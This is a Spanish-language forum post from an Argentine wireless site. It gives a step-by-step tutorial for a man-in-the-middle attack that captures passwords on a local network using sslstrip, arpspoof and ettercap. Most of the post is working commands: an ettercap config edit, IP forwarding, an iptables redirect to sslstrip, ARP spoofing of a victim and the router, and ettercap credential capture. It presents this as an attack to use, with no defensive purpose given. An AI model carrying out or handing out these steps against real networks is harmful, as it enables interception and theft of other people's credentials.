22 de Octubre de 2017, 09:33:00 pm
  • WPSdb - Base de Datos de Pines Online

Autor Tema: [Ataques] Man in the middle (Levantar contraseíñas de red local)  (Leído 5316 veces)

Desconectado D3M0N

  • Founder
  • Usuario
  • *
  • Mensajes: 3.120
  • Reputación: +247/-3
  • El Mate, La Netbook y Wi-Fi del Vecino!
  • awards Usuario con más de 2000 Posts! Miembro registrado desde 2010 Usuario Registrado
    • Arg-Wireless.com.ar
    • Awards
[Ataques] Man in the middle (Levantar contraseíñas de red local)
« en: 13 de Marzo de 2011, 10:55:29 am »
Bueno, hoy les traigo un tuto...  :o asusta pero esta muy bueno...  8) en cuention se ejecuta en BackTrack pero solo necesitamos unos programitas y editar un par de cosas y listo.


El ataque MITM es uno de esos ataques en que el atacante debe de estar en la misma red que la victima. No importa el SO de la victima y las herramientas usadas son las siguientes:

+ sslstrip
+ arpspoof
+ ettercap

El ataque lo realice desde Backtrack 4 R2 y fue de la siguiente manera:
Primero editamos el siguiente archivo eliminando “#” para que se vea como acontinuaciín:

Código: [Seleccionar]
kate /etc/etter.conf

#---------------
#     Linux
#---------------

# if you use ipchains:
   #redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
   #redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"


Despues en otra terminal:

Código: [Seleccionar]
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
dhclient
sslstrip -a -k -f

En otra terminal:

Código: [Seleccionar]
arpspoof -i wlan0 -t ip-victima ip-ruter
arpspoof -i wlan0 -t 192.168.1.99 192.168.1.254

y al final en otra terminal:

Código: [Seleccionar]
ettercap -T -q -i wlan0

En el siguiente video muestro como controlo a 2 maquinas (ssh/vnc) para efectuar el ataque:


FUENTE: XMUDA
  • Antenas: Antena Komarov (Prototype), Antena Belgrain (MOD), Antenas 4, 5, 9dBi (omnis)
  • Sistemas Operativos: Microsoft Windows 7 Enterprice (x64), Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Sistemas Operativos que utilizo para Auditar: Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Dispositivos Inalambricos: Alfa AWUS036H 1W (USB); TP-Link TL-WN722N (USB); Ubiquiti Nanostation M2; Mikrotik RB951Ui-2HnD